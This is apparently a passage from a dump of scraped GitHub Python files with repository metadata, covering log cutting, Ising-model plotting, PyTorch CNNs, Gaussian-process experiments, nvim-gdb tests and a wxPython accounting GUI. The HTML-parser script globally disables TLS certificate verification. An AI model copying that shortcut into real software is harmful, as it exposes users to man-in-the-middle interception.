日志切割完成\")\n\n# 读取配置文件\nwith open(\"config_size.txt\", \"r\") as config_file:\n for line in config_file:\n # 解析配置项\n log_path, output_path, split_param = line.strip().split(',')\n\n log_name = os.path.splitext(os.path.basename(log_path))[0]\n size = float(split_param)\n split_log_by_size(log_path, output_path, size, log_name)\n","repo_name":"h5m2424/Python_Script","sub_path":"log_cutter/log_cutter_by_size.py","file_name":"log_cutter_by_size.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"16989361261","text":"#!/usr/bin/python3\ndef median(unsortedNumList):\n numList = sorted(unsortedNumList)\n middle = len(numList) // 2\n if len(numList) % 2 != 0:\n medianValue = numList[middle]\n else:\n medianValue = (numList[middle-1] + numList[middle]) / 2\n return medianValue\n\nif __name__ == '__main__':\n print(median([4, 5, 5, 4]))\n","repo_name":"aclissold/Python","sub_path":"Codecademy/median.py","file_name":"median.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35955157723","text":"from numpy import *\nfrom scipy import *\nfrom matplotlib.pyplot import *\nimport time\nimport sys\n\n# Open the file for reading\ninfile = open(\"beta0to0p1_Nbetas50_mcsteps1000_bins100_IsingMC.txt\", \"r\")\n\n# The first line contains information about the system. 
We read that separately\nfirstline = infile.readline() # Reads the first line only\n\n# Number of spins, spin size, number of bins\nN, s, bins = firstline.split()\nN = int(N); s = float(s); bins = int(bins) # Tested, and this is done successfully\n\n# Getting lists ready to store the data\nbetas = [] # List of beta values\nm_avs = [] # Average m over all bins and mcsteps, listed according to beta value\nsigma_msqs = [] # sigma_m**2: variance/bins + covariance\nvariances = [] # Variances\ncovs = [] # Covariance terms\nactimes = [] # Autocorrelation times\n\n# Read the rest of the lines\nlines = infile.readlines() # This works, I have checked it\n\n# Getting data from the file\nfor line in lines:\n words = line.split()\n if len(words) != 0:\n # Betas\n beta = float(words[0])\n betas.append(beta)\n # m_avs\n m_av = float(words[1])\n m_avs.append(m_av)\n # sigma_msq\n sigma_msq = float(words[2])\n sigma_msqs.append(sigma_msq)\n # variances\n var = float(words[3])\n variances.append(var)\n # covs\n cov = float(words[4])\n covs.append(cov)\n # actimes\n act = float(words[5])\n actimes.append(act)\n \n \n# We prefer arrays\nbetas = array(betas)\nm_avs = array(m_avs)\nsigma_msqs = array(sigma_msqs)\nvariances = array(variances)\ncovs = array(covs)\nactimes = array(actimes)\n\n# Remember to close the file\ninfile.close()\n\n# Doing the plotting thing\nfigure()\nplot(betas, m_avs, 'r')\ntitle('Average squared magnetization vs temperature in the Ising model')\nxlabel(r'$\\beta$')\nylabel(r'$^2$')\nshow()\n\nfigure()\nplot(betas, m_avs/(s*s), 'r') # Normalizing the spin \ntitle('Average squared magnetization vs temperature in the Ising model, with s=1')\nxlabel(r'$\\beta$')\nylabel(r'$^2$')\nshow()\n\nfigure()\nplot(betas, sigma_msqs, 'r')\ntitle(r'Total variance $\\sigma^2_m$ of $^2$ vs temperature in the Ising model')\nxlabel(r'$\\beta$')\nylabel(r'$\\sigma_m$')\nshow()\n\nfigure()\nplot(betas, variances, 'r')\ntitle(r'Variance $\\sigma^2$ of $^2$ in the Ising model')\nxlabel(r'$\\beta$')\nylabel(r'$\\sigma$')\nshow()\n\nfigure()\nplot(betas, covs, 'r')\ntitle(r'Covariance of $^2$ in the Ising model')\nxlabel(r'$\\beta$')\nylabel('Covariance')\nshow()\n\nfigure()\nplot(betas, actimes, 'r')\ntitle(r'Autocorrelation time $\\tau$ of $^2$ in the Ising model')\nxlabel(r'$\\beta$')\nylabel(r'$\\tau$')\nshow()\n\n\n","repo_name":"KineOdegardHanssen/ising2d_metropolis","sub_path":"plot_Ising2DMetropolis.py","file_name":"plot_Ising2DMetropolis.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36784514381","text":"\r\ninputnum = 0\r\n\r\nwhile inputnum != -1:\r\n inputnum = input(\"Please enter the required value (-1 to quit): \")\r\n thelist = list( int(x) for x in str(inputnum))\r\n icount = len(thelist)-1\r\n\r\n #numdigit = len(thelist)-1\r\n #inter = numdigit\r\n while icount > 0:\r\n if thelist[icount-1] > thelist[icount]:\r\n thelist[icount-1] = thelist[icount]\r\n i = icount\r\n while i <= (len(thelist)-1):\r\n thelist[i] = 9\r\n i +=1\r\n icount -= 1\r\n res_string = \"\".join(str(e) for e in thelist)\r\n print(int(res_string))","repo_name":"StefanOosAust/InterviewQ","sub_path":"part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73151669978","text":"from core.commands_templates import CommandTemplate\nfrom dsmodule.subjects import UserSubject\n\nclass 
Command(CommandTemplate):\n\n def execute_command(self):\n \n user_subject = UserSubject()\n subject_names = user_subject.get_subjects_names()\n\n print(\"--- Start of the list ---\")\n\n for subject_id, subject_name in enumerate(subject_names, start = 1):\n print(f\"ID: {subject_id} Name: {subject_name}\")\n \n print(\"--- End of the list ---\")\n","repo_name":"dgop92/utils3","sub_path":"dsmodule/commands/ls.py","file_name":"ls.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28422340026","text":"import pandas as pd\nimport json\nimport sys\n\nwith open(sys.argv[1], 'r+') as f:\n \tcontent = f.read()\n \tf.seek(0, 0)\n \tf.write(\"{\\n\\t\\\"data\\\": \" + content + \"\\n}\")\nwith open(sys.argv[1], \"r\") as f:\n raw = json.load(f)\n for i in range(len(raw[\"data\"])):\n for j in range(4):\n raw[\"data\"][i][\"paragraph_\" + str(j)] = raw[\"data\"][i][\"paragraphs\"][j]\n if sys.argv[1] == \"train.json\" or sys.argv[1] == \"valid.json\":\n if raw[\"data\"][i][\"paragraphs\"][j] == raw[\"data\"][i][\"relevant\"]:\n raw[\"data\"][i][\"label\"] = j\n del(raw[\"data\"][i][\"paragraphs\"])\n if sys.argv[1] == \"train.json\" or sys.argv[1] == \"valid.json\":\n del(raw[\"data\"][i][\"answer\"])\nwith open(sys.argv[2], \"w\") as f:\n json.dump(raw, f, indent=2, ensure_ascii=False)\n\n\n\n\n","repo_name":"akairisu/CSIE5431-2022-Spring-ADL-HW2","sub_path":"preprocess_context.py","file_name":"preprocess_context.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"28481259152","text":"import torch\n\nclass SimpleCNN(torch.nn.Module):\n def __init__(self, n_in_channels: int = 1, n_hidden_layers: int = 3, n_kernels: int = 32, kernel_size: int = 7):\n \"\"\"Simple CNN with `n_hidden_layers`, `n_kernels`, and `kernel_size` as hyperparameters\"\"\"\n super(SimpleCNN, self).__init__()\n \n cnn = []\n for i in range(n_hidden_layers):\n cnn.append(torch.nn.Conv2d(in_channels=n_in_channels, out_channels=n_kernels, kernel_size=kernel_size,\n bias=True, padding=int(kernel_size/2)))\n cnn.append(torch.nn.ReLU())\n n_in_channels = n_kernels\n self.hidden_layers = torch.nn.Sequential(*cnn)\n self.output_layer = torch.nn.Conv2d(in_channels=n_in_channels, out_channels=1,\n kernel_size=kernel_size, bias=True, padding=int(kernel_size/2))\n self.final_layer = torch.nn.Conv2d(in_channels=1, out_channels=1, kernel_size=3, bias=True, padding=int(3/2) )\n def forward(self, x):\n \"\"\"Apply CNN to input `x` of shape (N, n_channels, X, Y), where N=n_samples and X, Y are spatial dimensions\"\"\"\n cnn_out = self.hidden_layers(x) # apply hidden layers (N, n_in_channels, X, Y) -> (N, n_kernels, X, Y)\n pred = self.output_layer(cnn_out) # apply output layer (N, n_kernels, X, Y) -> (N, 1, X, Y)\n pred = self.final_layer(pred)\n \n #target_mask = torch.squeeze(x)[1].to(dtype=torch.bool)\n #pred = torch.squeeze(pred)[target_mask]\n\n return pred\n\nclass ComplexCNN(torch.nn.Module):\n def __init__(self):\n super(ComplexCNN, self).__init__()\n\n self.coarseCnn = SimpleCNN(n_in_channels=4, kernel_size=15)\n self.fineCnn = SimpleCNN(n_in_channels=4, kernel_size=3)\n\n self.outputCnn = SimpleCNN(n_in_channels=6)\n\n def forward(self, x):\n coarseOutput = self.coarseCnn(x)\n fineOutput = self.fineCnn(x)\n\n x = 
torch.cat((torch.unsqueeze(x[:,0,:,:],1),torch.unsqueeze(x[:,1,:,:],1),torch.unsqueeze(x[:,2,:,:],1),torch.unsqueeze(x[:,3,:,:],1), coarseOutput, fineOutput))\n x = x.permute(1,0,2,3)\n\n return self.outputCnn(x)\n","repo_name":"FritzMichael/ImageCropProject","sub_path":"architectures.py","file_name":"architectures.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"372370406","text":"#!/usr/bin/env python\nimport ssl\nfrom html.parser import HTMLParser\nfrom urllib.request import Request, urlopen\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n\nclass Parser(HTMLParser):\n tags = []\n\n def error(self, message):\n pass\n\n def handle_starttag(self, tag, attrs):\n\n self.tags.append(tag)\n\n if tag == 'enclosure':\n for attr, value in attrs:\n if attr == 'url' and value.startswith('http'):\n print('url =', value)\n break\n\n def handle_data(self, data):\n data = data.strip()\n if data.strip() != \"\":\n tag = self.tags[-1]\n print(tag, ':', data)\n\n def handle_endtag(self, tag):\n self.tags.pop()\n\n\nparser = Parser()\n\nheaders = {\n 'Connection': 'keep-alive',\n 'User-Agent': 'Mozilla/5.0',\n 'Accept': 'image/jpg,image/*,*/*',\n 'Accept-Encoding': 'gzip,deflate,br',\n 'Accept-Language': 'en-US,en'\n}\nurl = \"https://docs.python.org/3/library/urllib.html\"\nreq = Request(url, headers=headers)\nsite = urlopen(url)\nhtml = site.read()\n\nparser.feed(html.decode('utf-8'))\n","repo_name":"rjcostales/python","sub_path":"http/link_parser.py","file_name":"link_parser.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"27704155759","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nfrom IPython import get_ipython\n\n# %%\n# %load_ext autoreload\n# %autoreload 2\nget_ipython().run_line_magic(\"load_ext\", \"autoreload\")\nget_ipython().run_line_magic(\"autoreload\", \"2\")\nimport numpy as np\nimport jax\nimport jax.numpy as jnp\nimport jax.random as jr\nimport jax.scipy as jsp\nimport tensorflow_probability\nfrom tensorflow_probability.python.internal.backend import jax as tf2jax\n\ntfp = tensorflow_probability.experimental.substrates.jax\ntfk = tfp.math.psd_kernels\nimport optax\nimport matplotlib.pyplot as plt\nfrom IPython.display import set_matplotlib_formats\n\nset_matplotlib_formats(\"svg\")\nimport sys\n\nsys.path.insert(0, \"..\")\nfrom riemannianvectorgp.sparse_gp import SparseGaussianProcess\nfrom riemannianvectorgp.gp import GaussianProcess\nfrom riemannianvectorgp.kernel import (\n SquaredExponentialCompactRiemannianManifoldKernel,\n MaternCompactRiemannianManifoldKernel,\n ScaledKernel,\n EigenBasisFunctionState,\n TFPKernel,\n ManifoldProjectionVectorKernel,\n)\nfrom riemannianvectorgp.manifold import S1, EmbeddedS1\nfrom einops import rearrange\n\n\nfrom jax.config import config\n\n# config.update(\"jax_debug_nans\", True)\n# config.update(\"jax_disable_jit\", True)\n\n# %%\ndef plot(x, y, gp, params, state, samples=False):\n fig = plt.figure()\n # ax = fig.add_subplot(projection=\"polar\")\n ax = fig.add_subplot()\n\n state = gp.randomize(params, state, next(rng))\n\n K = gp.kernel.matrix(\n params.kernel_params, params.inducing_locations, params.inducing_locations\n )\n K = rearrange(K, \"M1 M2 OD1 OD2 -> (M1 OD1) (M2 OD2)\")\n\n M, OD = params.inducing_pseudo_log_err_stddev.shape\n Sigma = 
rearrange(\n jnp.exp(2 * params.inducing_pseudo_log_err_stddev), \"M OD -> (M OD)\"\n )\n Sigma = jnp.diag(Sigma)\n inducing_pseudo_mean = rearrange(params.inducing_pseudo_mean, \"M OD -> (M OD)\")\n\n inducing_mean = tf2jax.linalg.matvec(\n K + Sigma,\n inducing_pseudo_mean,\n )\n inducing_mean = rearrange(inducing_mean, \"(M OD) -> M OD\", M=M, OD=OD)\n f = gp(params, state, x)[:, :, 0]\n f_prior = gp.prior(params.kernel_params, state.prior_state, x)[:, :, 0]\n\n k = kernel.matrix(params.kernel_params, x, x)[0, :, 0]\n\n x = x[:, 0]\n y = y[:, 0]\n\n ax.scatter(x, y)\n\n m = jnp.mean(f, axis=0)\n u = jnp.quantile(f, 0.975, axis=0)\n l = jnp.quantile(f, 0.025, axis=0)\n\n ax.plot(x, m, linewidth=2)\n ax.fill_between(x, l, u, alpha=0.5)\n\n if samples:\n for i in range(f.shape[0]):\n ax.plot(x, f[i, :], color=\"gray\", alpha=0.5)\n\n ax.scatter(params.inducing_locations[:, 0], inducing_mean, zorder=6)\n ax.errorbar(\n params.inducing_locations[:, 0],\n inducing_mean[:, 0],\n yerr=jnp.exp(params.inducing_pseudo_log_err_stddev[:, 0]),\n linestyle=\"none\",\n zorder=5,\n )\n\n\ndef plot_gp(x, y, gp, params, state, samples=False):\n\n fig, axs = plt.subplots(3, 1, figsize=(4, 9))\n\n state = gp.randomize(params, state, next(rng))\n\n K = gp.kernel.matrix(\n params.kernel_params, params.inducing_locations, params.inducing_locations\n )\n K = rearrange(K, \"M1 M2 OD1 OD2 -> (M1 OD1) (M2 OD2)\")\n\n M, OD = params.inducing_pseudo_log_err_stddev.shape\n Sigma = rearrange(\n jnp.exp(2 * params.inducing_pseudo_log_err_stddev), \"M OD -> (M OD)\"\n )\n Sigma = jnp.diag(Sigma)\n inducing_pseudo_mean = rearrange(params.inducing_pseudo_mean, \"M OD -> (M OD)\")\n\n inducing_mean = tf2jax.linalg.matvec(\n K + Sigma,\n inducing_pseudo_mean,\n )\n inducing_mean = rearrange(inducing_mean, \"(M OD) -> M OD\", M=M, OD=OD)\n f = gp(params, state, x)[:, :, 0]\n f_prior = gp.prior(params.kernel_params, state.prior_state, x)[:, :, 0]\n\n k = kernel.matrix(params.kernel_params, x, x)[0, :, 0]\n\n x = x[:, 0]\n y = y[:, 0]\n\n axs[0].scatter(x, y)\n # ax.set_rmin-(-4)\n\n m = jnp.mean(f, axis=0)\n u = jnp.quantile(f, 0.975, axis=0)\n l = jnp.quantile(f, 0.025, axis=0)\n\n axs[0].plot(x, m, linewidth=2)\n axs[0].fill_between(x, l, u, alpha=0.5)\n\n if samples:\n for i in range(f.shape[0]):\n axs[0].plot(x, f[i, :], color=\"gray\", alpha=0.5)\n\n axs[0].scatter(params.inducing_locations[:, 0], inducing_mean, zorder=6)\n axs[0].errorbar(\n params.inducing_locations[:, 0],\n inducing_mean[:, 0],\n yerr=jnp.exp(params.inducing_pseudo_log_err_stddev[:, 0]),\n linestyle=\"none\",\n zorder=5,\n )\n axs[0].set_title(\"Sparse GP\")\n axs[1].plot(x, f_prior.T)\n axs[1].set_title(\"Prior samples\")\n axs[2].plot(x, k)\n axs[2].set_title(\"Kernel\")\n\n plt.tight_layout()\n\n\nclass GlobalRNG:\n def __init__(self, seed: int = np.random.randint(2147483647)):\n self.key = jax.random.PRNGKey(seed)\n\n def __iter__(self):\n return self\n\n def __next__(self):\n (ret_key, self.key) = jr.split(self.key)\n return ret_key\n\n\n# %%\n\nrng = GlobalRNG()\n\n# %%\nx = jnp.expand_dims(jnp.linspace(0, jnp.pi * 2, 101), -1)\ny = 2 * jnp.sin(x) + jr.normal(next(rng), x.shape) / 10\n\n\n# %%\nkernel = ScaledKernel(TFPKernel(tfk.ExponentiatedQuadratic, 1, 1))\nkernel_params = kernel.init_params(next(rng))\nsub_kernel_params = kernel_params.sub_kernel_params\nsub_kernel_params = sub_kernel_params._replace(log_length_scale=jnp.log(jnp.array(0.5)))\nkernel_params = kernel_params._replace(sub_kernel_params=sub_kernel_params)\nkernel_params = 
kernel_params._replace(\n log_amplitude=-jnp.log(kernel.matrix(kernel_params, x, x)[0, 0, 0])\n)\nk = kernel.matrix(kernel_params, x, x)\nplt.plot(x[:, 0], k[0, :, 0, 0], label=\"EQ - euclidean\")\n\ns1 = S1(0.5)\nkernel = ScaledKernel(SquaredExponentialCompactRiemannianManifoldKernel(s1, 100))\n# kernel = ScaledKernel(MaternCompactRiemannianManifoldKernel(4.5,s1, 100))\nkernel_params = kernel.init_params(next(rng))\nsub_kernel_params = kernel_params.sub_kernel_params\nsub_kernel_params = sub_kernel_params._replace(log_length_scale=jnp.log(0.15))\nkernel_params = kernel_params._replace(sub_kernel_params=sub_kernel_params)\nkernel_params = kernel_params._replace(\n log_amplitude=-jnp.log(kernel.matrix(kernel_params, x, x)[0, 0, 0])\n)\nk = kernel.matrix(kernel_params, x, x)\nplt.plot(x[:, 0], k[0, :, 0, 0], label=\"EQ\")\nfor nu in [0.5, 1.5, 2.5, 3.5, 4.5]:\n kernel = ScaledKernel(MaternCompactRiemannianManifoldKernel(nu, s1, 100))\n kernel_params = kernel.init_params(next(rng))\n sub_kernel_params = kernel_params.sub_kernel_params\n sub_kernel_params = sub_kernel_params._replace(log_length_scale=jnp.log(0.15))\n kernel_params = kernel_params._replace(sub_kernel_params=sub_kernel_params)\n kernel_params = kernel_params._replace(\n log_amplitude=-jnp.log(kernel.matrix(kernel_params, x, x)[0, 0, 0])\n )\n k = kernel.matrix(kernel_params, x, x)\n plt.plot(x[:, 0], k[0, :, 0, 0], label=f\"{nu}\")\nplt.legend()\nplt.title(f\"LS: {jnp.exp(kernel_params.sub_kernel_params.log_length_scale):0.3f}\")\n# %%\ns1 = S1(1.0)\nkernel = ScaledKernel(SquaredExponentialCompactRiemannianManifoldKernel(s1, 100))\n# kernel = ScaledKernel(MaternCompactRiemannianManifoldKernel(1.5, s1, 100))\nkernel_params = kernel.init_params(next(rng))\nsub_kernel_params = kernel_params.sub_kernel_params\nsub_kernel_params = sub_kernel_params._replace(log_length_scale=jnp.log(0.1))\nkernel_params = kernel_params._replace(sub_kernel_params=sub_kernel_params)\nkernel_params = kernel_params._replace(\n log_amplitude=-jnp.log(kernel.matrix(kernel_params, x, x)[0, 0, 0])\n)\nk = kernel.matrix(kernel_params, x, x)\n\nprint(k.shape)\nplt.plot(x[:, 0], k[0, :, 0, 0], label=\"EQ\")\n# %%\ns1 = EmbeddedS1(1.0)\nkernel = ScaledKernel(\n ManifoldProjectionVectorKernel(\n # SquaredExponentialCompactRiemannianManifoldKernel(s1, 100)\n MaternCompactRiemannianManifoldKernel(0.5, s1, 100),\n s1,\n )\n)\nkernel_params = kernel.init_params(next(rng))\nsub_kernel_params = kernel_params.sub_kernel_params\nsub_kernel_params = sub_kernel_params._replace(log_length_scale=jnp.log(0.1))\nkernel_params = kernel_params._replace(sub_kernel_params=sub_kernel_params)\nkernel_params = kernel_params._replace(\n log_amplitude=-jnp.log(kernel.matrix(kernel_params, x, x)[0, 0, 0, 0])\n)\nk = kernel.matrix(kernel_params, x, x)\nprint(k.shape)\nplt.plot(x[:, 0], k[0, :, 0, 0], label=\"EQ\")\n# %%\nrng = GlobalRNG()\ngp = SparseGaussianProcess(kernel, 11, 67, 100)\n(params, state) = gp.init_params_with_state(next(rng))\nparams = params._replace(kernel_params=kernel_params)\n\n\n# %%\nparams\n\n\n# %%\nx_ind = jnp.expand_dims(jnp.linspace(0, 2 * jnp.pi, 11), -1)\ny_ind = 2 * jnp.sin(x_ind) + jr.normal(next(rng), x_ind.shape) / 10\ny_ind = jnp.zeros_like(x_ind)\n\nparams = gp.set_inducing_points(params, x_ind, y_ind, jnp.ones_like(y_ind) * 0.01)\n\n\n# %%\nstate = gp.resample_prior_basis(params, state, next(rng))\nstate = gp.randomize(params, state, next(rng))\n\n# %%\n\nplot_gp(x, y, gp, params, state, samples=True)\n\n# %%\nopt = 
optax.chain(optax.scale_by_adam(b1=0.9, b2=0.999, eps=1e-8), optax.scale(-0.01))\nopt_state = opt.init(params)\n\n# %%\ndebug_params = [params]\ndebug_states = [state]\ndebug_keys = [rng.key]\n\n# %%\nfor i in range(600):\n ((train_loss, state), grads) = jax.value_and_grad(gp.loss, has_aux=True)(\n params, state, next(rng), x, y, x.shape[0]\n )\n (updates, opt_state) = opt.update(grads, opt_state)\n params = optax.apply_updates(params, updates)\n if jnp.all(jnp.isnan(grads.kernel_params.sub_kernel_params.log_length_scale)):\n print(\"breaking for nan\")\n break\n if i <= 10 or i % 20 == 0:\n print(i, \"Loss:\", train_loss)\n debug_params.append(params)\n debug_states.append(state)\n debug_keys.append(rng.key)\n\n# %%\n\nplot_gp(x, y, gp, debug_params[-1], debug_states[-1], samples=True)\n\n# %%\njax.value_and_grad(gp.loss, has_aux=True)(\n debug_params[-1], debug_states[-1], debug_keys[-1], x, y, x.shape[0]\n)\n\n# %%\nconfig.update(\"jax_debug_nans\", True)\n\n# %%\njax.grad(gp.loss, has_aux=True)(\n debug_params[-1], debug_states[-1], debug_keys[-1], x, y, x.shape[0]\n)\n\n# %%\ndebug_params[-1]\n\n# %%\n\nplot_gp(x, y, gp, params, state, samples=False)\nprint(gp.loss(params, state, next(rng), x, y, x.shape[0])[0])\n# %%\n","repo_name":"MJHutchinson/ExtrinsicGaugeIndependentVectorGPs","sub_path":"examples/circle_sine.py","file_name":"circle_sine.py","file_ext":"py","file_size_in_byte":10208,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"68"} +{"seq_id":"15567357198","text":"'''Test keymaps configuration.'''\n\n# pylint: disable=redefined-outer-name\n\nimport pytest\n\n\ndef _launch(eng):\n eng.feed(\":GdbStart ./dummy-gdb.sh\\n\")\n\n\n@pytest.fixture(scope='function')\ndef keymap(eng, post):\n '''Fixture to clear custom keymaps.'''\n assert post\n yield True\n eng.exe('source keymap_cleanup.vim')\n\n\ndef test_hooks(eng, keymap):\n '''Test custom programmable keymaps.'''\n assert keymap\n eng.exe(\"source keymap_hooks.vim\")\n _launch(eng)\n\n assert eng.eval('g:test_tkeymap') == 0\n eng.feed('~tkm')\n assert eng.eval('g:test_tkeymap') == 1\n eng.feed('')\n assert eng.eval('g:test_keymap') == 0\n eng.feed('~tn')\n assert eng.eval('g:test_keymap') == 1\n eng.exe('let g:test_tkeymap = 0 | let g:test_keymap = 0')\n eng.feed('w')\n assert eng.eval('g:test_keymap') == 0\n eng.feed('~tn')\n assert eng.eval('g:test_keymap') == 1\n eng.exe('let g:test_keymap = 0')\n\n\ndef test_conflict(eng, keymap):\n '''Conflicting keymap.'''\n assert keymap\n eng.exe(\"let g:nvimgdb_config = {'key_next': '', 'key_prev': ''}\")\n _launch(eng)\n\n count = eng.eval(\n 'len(filter(GdbTestPeekConfig(), {k,v -> k =~ \"^key_.*\"}))')\n assert count == 1\n # Check that the cursor is moving freely without stucking\n eng.feed('')\n eng.feed('w')\n eng.feed('w')\n\n\ndef test_override(eng, keymap):\n '''Override a key.'''\n assert keymap\n eng.exe(\"let g:nvimgdb_config_override = {'key_next': ''}\")\n _launch(eng)\n key = eng.eval('get(GdbTestPeekConfig(), \"key_next\", 0)')\n assert key == ''\n\n\ndef test_override_priority(eng, keymap):\n '''Check that a config override assumes priority in a conflict.'''\n assert keymap\n eng.exe(\"let g:nvimgdb_config_override = {'key_next': ''}\")\n _launch(eng)\n res = eng.eval('get(GdbTestPeekConfig(), \"key_breakpoint\", 0)')\n assert res == 0\n\n\ndef test_override_one(eng, keymap):\n '''Override a single key.'''\n assert keymap\n eng.exe(\"let g:nvimgdb_key_next = ''\")\n _launch(eng)\n key = eng.eval('get(GdbTestPeekConfig(), 
\"key_next\", 0)')\n assert key == ''\n\n\ndef test_override_one_priority(eng, keymap):\n '''Override a single key, priority.'''\n assert keymap\n eng.exe(\"let g:nvimgdb_key_next = ''\")\n _launch(eng)\n res = eng.eval('get(GdbTestPeekConfig(), \"key_breakpoint\", 0)')\n assert res == 0\n\n\ndef test_overall(eng, keymap):\n '''Smoke test.'''\n assert keymap\n eng.exe(\"let g:nvimgdb_config_override = {'key_next': ''}\")\n eng.exe(\"let g:nvimgdb_key_step = ''\")\n _launch(eng)\n res = eng.eval('get(GdbTestPeekConfig(), \"key_continue\", 0)')\n assert res == 0\n res = eng.eval('get(GdbTestPeekConfig(), \"key_next\", 0)')\n assert res == 0\n key = eng.eval('get(GdbTestPeekConfig(), \"key_step\", 0)')\n assert key == ''\n","repo_name":"SkyLeach/nvim-gdb","sub_path":"test/test_40_keymap.py","file_name":"test_40_keymap.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"68"} +{"seq_id":"30493675051","text":"import wx\nfrom wx.lib.wordwrap import wordwrap\n\nimport os\nfrom functools import partial\nfrom .dialogs import StatementCreationWizard, SettingsDialog\nfrom .dialogs import STATEMENT, REGISTRY\nfrom ..utils import pub, silent_remove, get_save_path_from_dialog\nfrom ..topics import *\nfrom ..constants import *\nfrom .HistoryViewer import HistoryViewer\nfrom .TransactionMaker import TransactionMaker\nfrom . import images\nfrom yapsy.PluginManager import PluginManagerSingleton\nfrom ..models import UserError\nfrom ... import about\nfrom .events import EVT_TRANSACTION_EDIT\n\nclass MenuItemToggleListener:\n def __init__(self, menuItem):\n self.menuItem = menuItem\n\n def __call__(self, enabled):\n self.menuItem.Enable(enabled)\n\nclass MainFrame(wx.Frame):\n def __init__(self, backend, parent, title=MAIN_FRAME_TITLE,\n style= wx.DEFAULT_FRAME_STYLE\n |wx.MAXIMIZE ):\n wx.Frame.__init__(self, parent, style=style, title=title)\n self.backend = backend\n self.setupMenuBar()\n self.statusbar = self.CreateStatusBar()\n self.history_viewer = HistoryViewer(backend, self)\n\n sizer = wx.BoxSizer(wx.VERTICAL)\n self.transaction_maker = TransactionMaker(backend, self)\n pub.subscribe(self.OnAddTransactionToggle, ADD_TRANSACTION)\n pub.subscribe(self.OnTransactionAdded, TRANSACTION_ADDED)\n sizer.Add(self.transaction_maker,1,wx.EXPAND)\n self.SetSizerAndFit(sizer)\n self.SetIcons(images.GetIconBundleFromImage(images.getAppIconImage()))\n\n self.Bind(EVT_TRANSACTION_EDIT, self.OnEditTransaction)\n\n def OnEditTransaction(self, evt):\n self.transaction_maker.FromTransaction(evt.transaction)\n\n def OnTransactionAdded(self, id):\n self.statusbar.PushStatusText('New transaction added with '\n 'transaction id {}'.format(id))\n def OnAddTransactionToggle(self,enabled):\n self.transaction_maker.Toggle(enabled)\n\n def menuData(self):\n return (('&File',\n (\n ('New Database', wx.ID_NEW, self.OnCreateDatabase, OPEN_DATABSE),\n ('Open Database',wx.ID_OPEN, self.OnOpenDatabase, OPEN_DATABSE),\n ('Exit', wx.ID_EXIT, self.OnExit)\n )\n ),\n ('&Database',\n (\n ('Initialize Database\\tCTRL+I', wx.NewId(), self.OnInitDatabase, INIT_DATABASE),\n ('Generate Statement\\tCTRL+S', wx.NewId(), self.OnGenerateStatement ,GENERATE_STATEMENT),\n (),\n ('View History \\tCTRL+H', wx.NewId(), self.OnViewHistory, GET_HISTORY)\n )\n ),\n ('Preferences',\n (\n ('Settings\\tCTRL+T', wx.NewId(), self.OnSettings ),\n )\n ),\n ('Help',\n (\n ('About',wx.ID_ABOUT,self.OnAbout),\n )\n )\n )\n\n def setupMenuBar(self):\n self.togglers = {}\n menubar = 
wx.MenuBar()\n for menuLabel, menuItems in self.menuData():\n menu = wx.Menu()\n for mi in menuItems:\n if len(mi) == 0:\n menu.AppendSeparator()\n continue\n item = menu.Append(mi[1], mi[0])\n self.Bind(wx.EVT_MENU, mi[2], id=mi[1])\n if len(mi) >= 4:\n self.togglers[item] = MenuItemToggleListener(item)\n pub.subscribe(self.togglers[item], mi[3])\n menubar.Append(menu, menuLabel)\n self.SetMenuBar(menubar)\n\n def OnAbout(self, evt):\n info = wx.AboutDialogInfo()\n for a in ('Name','Version','Copyright','WebSite','Developers'):\n setattr(info,a,getattr(about,a))\n\n for b,w in (('License',700),('Description',500)):\n setattr(info,b,wordwrap(getattr(about,b),w,\n wx.ClientDC(self)))\n wx.AboutBox(info)\n\n def OnExit(self, evt):\n self.Close()\n\n def OnSettings(self, evt):\n dlg = SettingsDialog(self)\n dlg.ShowModal()\n dlg.Destroy()\n\n def OnOpenDatabase(self, evt):\n dlg = wx.FileDialog(self, message=\"Open Database File ..\",\n wildcard=DB_FILE_WILD_CARD,\n style= wx.FD_OPEN|wx.FD_FILE_MUST_EXIST)\n\n if dlg.ShowModal() == wx.ID_OK:\n path = dlg.GetPath()\n self.OpenDatabase(path)\n\n dlg.Destroy()\n\n def OpenDatabase(self, path):\n self.backend.OpenDatabase(path)\n self.statusbar.PushStatusText('Opened database file \"{}\"'\\\n .format(path))\n self.SetTitle('{} :{}'.format(MAIN_FRAME_TITLE,path))\n\n \n def OnCreateDatabase(self, evt):\n dlg = wx.FileDialog(self, message=\"Create Database file..\",\n wildcard=DB_FILE_WILD_CARD,\n defaultFile=DEFAULT_DB_FILE_NAME,\n style=wx.FD_SAVE|wx.FD_OVERWRITE_PROMPT)\n\n path = get_save_path_from_dialog(dlg, DB_FILE_EXTENSION)\n\n dlg.Destroy()\n\n if path is None:\n return\n\n silent_remove(path)\n self.backend.OpenDatabase(path)\n\n self.statusbar.PushStatusText('Created new database file \"{}\"'\\\n .format(path))\n\n\n def OnInitDatabase(self, evt):\n dlg = wx.FileDialog(self, message=\"Open file to init database ..\",\n wildcard=INIT_FILE_WILD_CARD,\n 